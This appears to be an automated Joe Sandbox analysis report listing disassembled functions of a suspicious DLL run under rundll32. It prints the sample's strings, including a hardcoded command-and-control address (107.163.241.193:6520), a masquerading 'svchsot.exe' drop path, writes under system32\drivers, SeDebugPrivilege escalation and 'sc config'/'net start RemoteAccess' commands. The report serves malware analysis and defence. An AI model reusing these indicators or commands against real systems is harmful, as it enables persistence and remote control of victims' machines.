                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K$PTU
                                      • API String ID: 0-3860820754
                                      • Opcode ID: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                      • Instruction ID: b75c2c7393efce8f34ebcfbcfaf34b01291ef2e5bdad3d1dcf9c2601cb2aebd7
                                      • Opcode Fuzzy Hash: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                      • Instruction Fuzzy Hash: C791913011A3856EDB04DB688CC0E9BFBED9FD6704F04494EFA809B296D5E1D549CBB2
                                      Function 100052E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,100079BE), ref: 100052FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AdjustPrivilegesToken
                                      • String ID:
                                      • API String ID: 2874748243-0
                                      • Opcode ID: d54e74ece54ee20424641922b2b5810720bfc680afc0c90e10e7fcf085b7feb0
                                      • Instruction ID: 7c1a2bbd7757006d5c946c3e80e0d766e9fd4947b997df4eed36b7743c05efd3
                                      • Opcode Fuzzy Hash: d54e74ece54ee20424641922b2b5810720bfc680afc0c90e10e7fcf085b7feb0
                                      • Instruction Fuzzy Hash: 87D0BCB5618742AF9704CF58D994C3BB7EABBCC600F148D0CB59583254D730E849CB62
                                      Function 10005160 Relevance: 1.5, APIs: 1, Instructions: 6shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExitWindowsEx.USER32(?,00000000), ref: 1000516A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExitWindows
                                      • String ID:
                                      • API String ID: 1089080001-0
                                      • Opcode ID: f32a497f43df2c1907ad6a4c0e45c824a67bd738c1fb00097a1c7dc51b4314dc
                                      • Instruction ID: 3d1d98dc7dfc941cc0ac06cd550d9a2c3aa2a9b641fa0ba9a55bbc5b6fa54b5c
                                      • Opcode Fuzzy Hash: f32a497f43df2c1907ad6a4c0e45c824a67bd738c1fb00097a1c7dc51b4314dc
                                      • Instruction Fuzzy Hash: 3BB012B4204300BFDE04CB10CA88C2B77ECEBC4300F00880CF48A82110C638DC40CB11
                                      Function 1000DAF0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: bad d_code
                                      • API String ID: 0-2582332627
                                      • Opcode ID: fc44b8c4038ebeeeda07eb89f8e529569e6f123d0d3217017c0b5f9ecc597cae
                                      • Instruction ID: 665bd046f07fd8db9b7779670f0409ca2859fa848a28491a6d1a111cb4859fc9
                                      • Opcode Fuzzy Hash: fc44b8c4038ebeeeda07eb89f8e529569e6f123d0d3217017c0b5f9ecc597cae
                                      • Instruction Fuzzy Hash: 7141E0751082429FE314EF69D841AFFB7E5EFC8244F45846EF9858B205EB30E906C7A2
                                      Function 1000F460 Relevance: .1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e8bfaf921686b3efd01c1dd03c9d08ec0da7e696f39a6730f007d051e803caa
                                      • Instruction ID: 4a2e9bce1860761ec30e66eaab1871a96e7508891839d0c178a78bfd6cadc41c
                                      • Opcode Fuzzy Hash: 7e8bfaf921686b3efd01c1dd03c9d08ec0da7e696f39a6730f007d051e803caa
                                      • Instruction Fuzzy Hash: 6F3192227AA0A207E344CEBD9CC4237BBD3DBCA286B6DC67CD584D7A0ED439D8074250
                                      Function 10022EE7 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f099c7322ba76fb5435672a37167c125e68f3adee88f7279b6dfaf27b937c7b
                                      • Instruction ID: 008e985e2b74be79368dc7b4926150b44706faffcaa7039d4d8544b292557155
                                      • Opcode Fuzzy Hash: 1f099c7322ba76fb5435672a37167c125e68f3adee88f7279b6dfaf27b937c7b
                                      • Instruction Fuzzy Hash: 90F0283440C6539B8B11DF3898905EEBB92EE61360FC4830DA6F4132D9CB33252A9A82
                                      Function 10006B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 211filesleepinjectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • %s\%s, xrefs: 10006BEB
                                      • c:\windows\system32\drivers\%s, xrefs: 10006C5E
                                      • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 10006D4F
                                      • c:\windows\system32\drivers\%s\%s, xrefs: 10006C77
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                      • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                      • API String ID: 3377497938-1917988604
                                      • Opcode ID: 59290b8ce7203b782a4386cc549f0c40f57852888d8e583e61626c5b0e8d8cdc
                                      • Instruction ID: f6abbdca6701fb3ef1abd676031fbe2b893677713a754b01e1bb176cbb5a4cb9
                                      • Opcode Fuzzy Hash: 59290b8ce7203b782a4386cc549f0c40f57852888d8e583e61626c5b0e8d8cdc
                                      • Instruction Fuzzy Hash: 8361F3B1204345AFE724CB78CC85BDAB7E6FBCC700F04892CF64597291DB79E6498662
                                      Function 10007280 Relevance: 36.8, APIs: 8, Strings: 13, Instructions: 97stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 100072AE
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 100072C5
                                      • GetModuleFileNameA.KERNEL32(10000000,C:\Users\user\Desktop\NaRZIOq3O8.dll,00000104), ref: 100072D7
                                      • strrchr.MSVCRT ref: 10007305
                                      • wsprintfA.USER32 ref: 10007322
                                      • wsprintfA.USER32 ref: 10007333
                                      • wsprintfA.USER32 ref: 10007344
                                      • 6D262DD0.MFC42(00000084), ref: 1000734B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: wsprintf$FileModuleName$D262strrchr
                                      • String ID: %s\%s$%s\version.txt$107.163.241.193:6520$11121541$11121541$C:\Users\user\Desktop$C:\Users\user\Desktop\11121541$C:\Users\user\Desktop\NaRZIOq3O8.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB45F69E$M%s$M107.163.241.193:6520
                                      • API String ID: 2695514821-652825888
                                      • Opcode ID: bc271560cedb00765316920da8e4c5159c95b6d1d661ac521e8f3be94e90d187
                                      • Instruction ID: b9efe17b6784d2d669a78e19c4a9e9dd53e4a6d02ea8afa0a3925ee485c6705f
                                      • Opcode Fuzzy Hash: bc271560cedb00765316920da8e4c5159c95b6d1d661ac521e8f3be94e90d187
                                      • Instruction Fuzzy Hash: DC210671A40A016FE708D7798C42FAA7AD1FB89720F444228F7169F2C1CBB8DDC1C255
                                      Function 100056F0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrIA.SHLWAPI(?,cmd.exe,774D0F00,?,00000000), ref: 10005706
                                      • GetCurrentProcessId.KERNEL32(?,00000000), ref: 10005729
                                        • Part of subcall function 10005460: CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000,?,00000000), ref: 10005522
                                        • Part of subcall function 10005460: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000), ref: 10005538
                                        • Part of subcall function 10005460: time.MSVCRT(00000000,?,00000000), ref: 1000553F
                                        • Part of subcall function 10005460: _localtime32.MSVCRT(?,?,00000000), ref: 1000554E
                                        • Part of subcall function 10005460: strftime.MSVCRT ref: 10005561
                                        • Part of subcall function 10005460: vsprintf.MSVCRT ref: 100055B3
                                        • Part of subcall function 10005460: sprintf.MSVCRT ref: 100055D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                      • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                      • API String ID: 3192119092-4191049792
                                      • Opcode ID: 854f7dac5efd665048c87d9b8970cb6dfe7fba4e3b9b490a123ec12e76592f85
                                      • Instruction ID: 532484bbb70a1c206dc26850c65d6d62aa1aacd866b304218ca9e6828c5413fb
                                      • Opcode Fuzzy Hash: 854f7dac5efd665048c87d9b8970cb6dfe7fba4e3b9b490a123ec12e76592f85
                                      • Instruction Fuzzy Hash: AC1127B62441187BF310A764ECC9FEF3358EF84356F404120FB0896181DA76E6A8C6B7
                                      Function 1000F650 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: _mbsicmp
                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                      • API String ID: 1961004622-51310709
                                      • Opcode ID: eb51e47cdfb029e0c5bba4cf766f21bdc37fe0109f550dcf1e1b313aa7a9cdda
                                      • Instruction ID: d0b6b29593ca128e0c780a1992337e20478c242a31cab124731502bf7dc4c56e
                                      • Opcode Fuzzy Hash: eb51e47cdfb029e0c5bba4cf766f21bdc37fe0109f550dcf1e1b313aa7a9cdda
                                      • Instruction Fuzzy Hash: 8D21273660416221A711F42D7C006DE93C8CFE21F6B07413BED54CA928E7569DC774EA
                                      Function 10006F40 Relevance: 26.3, APIs: 6, Strings: 9, Instructions: 96threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000,00000000), ref: 100068FA
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000), ref: 10006913
                                        • Part of subcall function 100068C0: 6D262DD0.MFC42(00000000,000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000), ref: 1000692D
                                        • Part of subcall function 100068C0: strrchr.MSVCRT ref: 1000693E
                                        • Part of subcall function 100068C0: strncpy.MSVCRT ref: 10006955
                                        • Part of subcall function 100068C0: strncpy.MSVCRT ref: 1000695F
                                        • Part of subcall function 100068C0: GetSystemInfo.KERNEL32(GatewayCostMetric,?,?,?,?,?,?,00000000,10009DD0), ref: 10006969
                                        • Part of subcall function 100068C0: GetCurrentProcess.KERNEL32(00000020,chOrder,?,?,?,?,?,?,00000000,10009DD0), ref: 1000698A
                                        • Part of subcall function 100068C0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,10009DD0), ref: 10006991
                                        • Part of subcall function 100068C0: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,10009DD0), ref: 100069A2
                                        • Part of subcall function 100068C0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000), ref: 100069D7
                                        • Part of subcall function 100068C0: CloseHandle.KERNEL32(44746553), ref: 100069E2
                                        • Part of subcall function 100068C0: sscanf.MSVCRT ref: 10006A0D
                                      • wsprintfA.USER32 ref: 10006F82
                                        • Part of subcall function 10006A20: strchr.MSVCRT ref: 10006A76
                                      • wsprintfA.USER32 ref: 10006FE8
                                      • wsprintfA.USER32 ref: 10007001
                                      • CreateDirectoryA.KERNEL32(PGateway,00000000), ref: 1000700C
                                        • Part of subcall function 100057F0: CreateFileA.KERNEL32(72656472,40000000,00000000,00000000,00000002,00000080,00000000,flushdns,77068400,10007027,file error,/flushdns), ref: 10005809
                                        • Part of subcall function 100057F0: WriteFile.KERNEL32(00000000,72657672,10019B1F,SearchOrder,00000000), ref: 1000582B
                                        • Part of subcall function 100057F0: CloseHandle.KERNEL32(00000000), ref: 10005832
                                        • Part of subcall function 10006240: CoInitializeEx.COMBASE(00000000,00000000), ref: 1000627D
                                        • Part of subcall function 10006240: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000628E
                                        • Part of subcall function 10006240: CoCreateInstance.COMBASE(Function_000141D0,00000000,00000001,10014100,10019B34), ref: 100062AE
                                        • Part of subcall function 10006240: 6D262DD0.MFC42(0000000C), ref: 100062BA
                                        • Part of subcall function 10006240: SysAllocString.OLEAUT32(?), ref: 100062E1
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000704A
                                      • CreateThread.KERNEL32(00000000,00000000,10006E10,00000000,00000000,00000000), ref: 10007071
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateD262$Processwsprintf$CloseFileHandleInitializeOpenTokenstrncpy$AdjustAllocCurrentDirectoryInfoInstanceLookupPrivilegePrivilegesSecurityStringSystemThreadValueWritesscanfstrchrstrrchr
                                      • String ID: %s\%s$/flushdns$PGateway$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$file error$sot.exe
                                      • API String ID: 4196162878-306053807
                                      • Opcode ID: 7f170ee2cb499793e24e968edf43b8bfd61a76d96f23d218329356d6fff09fe1
                                      • Instruction ID: 41850797e00835fd19c5dc62bd8ec1641ec243eb83e2333570ca87f476b8e30c
                                      • Opcode Fuzzy Hash: 7f170ee2cb499793e24e968edf43b8bfd61a76d96f23d218329356d6fff09fe1
                                      • Instruction Fuzzy Hash: 0231B1B1508341BFE310DB68CC959EB7BD9EB89340F408929F34597252DB39E989CB62
                                      Function 10008660 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 99registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 100086CB
                                      • _CxxThrowException.MSVCRT(?,10014468), ref: 100086E5
                                      • RegQueryValueExA.ADVAPI32(?,DLLPath,00000000,00000002,?,00000080), ref: 10008703
                                      • _CxxThrowException.MSVCRT(?,10014468), ref: 1000871D
                                      • StrStrIA.SHLWAPI(?,mp3), ref: 10008734
                                      • lstrlen.KERNEL32(?,00000000), ref: 10008743
                                      • RegCloseKey.ADVAPI32(?), ref: 10008782
                                      Strings
                                      • sc config RemoteAccess start= auto, xrefs: 1000876F
                                      • mp3, xrefs: 1000872E
                                      • DLLPath, xrefs: 100086FD, 1000874D
                                      • net start RemoteAccess, xrefs: 10008777
                                      • sc stop RemoteAccess, xrefs: 10008767
                                      • U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==, xrefs: 10008686
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExceptionThrow$CloseOpenQueryValuelstrlen
                                      • String ID: DLLPath$U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFJlbW90ZUFjY2Vzc1xSb3V0ZXJNYW5hZ2Vyc1xJcA==$mp3$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                      • API String ID: 1704467221-2251003411
                                      • Opcode ID: 5672b8f5415b280e889738a2cdecbb7482f37a150f7c0c73b0736cba258cb4d4
                                      • Instruction ID: 98638fa1fcb9202145d598dc851610221c132621e911f98ed3a9eff087df0439
                                      • Opcode Fuzzy Hash: 5672b8f5415b280e889738a2cdecbb7482f37a150f7c0c73b0736cba258cb4d4
                                      • Instruction Fuzzy Hash: 1E318DB5900259AFEB10DF94CC85FEFBBB8FB49690F104168F608A6241D7759E44CBB2
                                      Function 100091C0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 187networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007ECB
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007EEF
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007EFE
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007F0A
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007F19
                                        • Part of subcall function 10007E20: strncpy.MSVCRT ref: 10007F22
                                        • Part of subcall function 10007E20: strstr.MSVCRT ref: 10007F5F
                                        • Part of subcall function 10007E20: strcspn.MSVCRT ref: 10007F72
                                        • Part of subcall function 100073C0: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100073D7
                                        • Part of subcall function 100073C0: WSAIoctl.WS2_32 ref: 1000740F
                                        • Part of subcall function 10007750: RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,100199D8), ref: 1000777F
                                        • Part of subcall function 10007750: GlobalMemoryStatusEx.KERNEL32(?), ref: 10007839
                                        • Part of subcall function 10007750: GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,100199D8), ref: 10007892
                                      • send.WS2_32(00000000,?,00000128,00000000), ref: 1000923A
                                      • closesocket.WS2_32(00000000), ref: 10009246
                                      • select.WS2_32 ref: 1000929C
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 100092B8
                                      • recv.WS2_32(00000000,?,000000BC,00000000), ref: 100092DA
                                      • closesocket.WS2_32(00000000), ref: 1000938E
                                      • InterlockedExchange.KERNEL32(1001ADF8,00000001), ref: 1000939F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strstr$strcspn$closesocket$DefaultExchangeGlobalInterlockedIoctlLanguageMemoryOpenStatusSystemrecvselectsendsetsockoptstrncpy
                                      • String ID: SeShutdownPrivilege$zip
                                      • API String ID: 742242273-4289258210
                                      • Opcode ID: 245d204ab469e926d276d174df330e3e0c904efc8300d646043186f114eb481e
                                      • Instruction ID: 5b97793b30091e66d166c84626b7f7f8b724b7c0c757a19da8836300145a5849
                                      • Opcode Fuzzy Hash: 245d204ab469e926d276d174df330e3e0c904efc8300d646043186f114eb481e
                                      • Instruction Fuzzy Hash: BA51E271548305BAF320EB248C85FEF76D8EB84390F004A29FA59D60D5DB74EA59C662
                                      Function 100087A0 Relevance: 18.1, APIs: 12, Instructions: 87servicesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,10008B65,?), ref: 100087AF
                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10008B65,?), ref: 100087CA
                                      • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10008B65), ref: 100087EF
                                      • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,10008B65,?), ref: 100087FA
                                      • GetLastError.KERNEL32(?,?,?,?,10008B65,?), ref: 10008804
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 10008818
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 1000881B
                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,10008B65,?), ref: 10008836
                                      • Sleep.KERNEL32(00000064), ref: 1000884B
                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10008853
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 1000885A
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10008B65,?), ref: 10008862
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
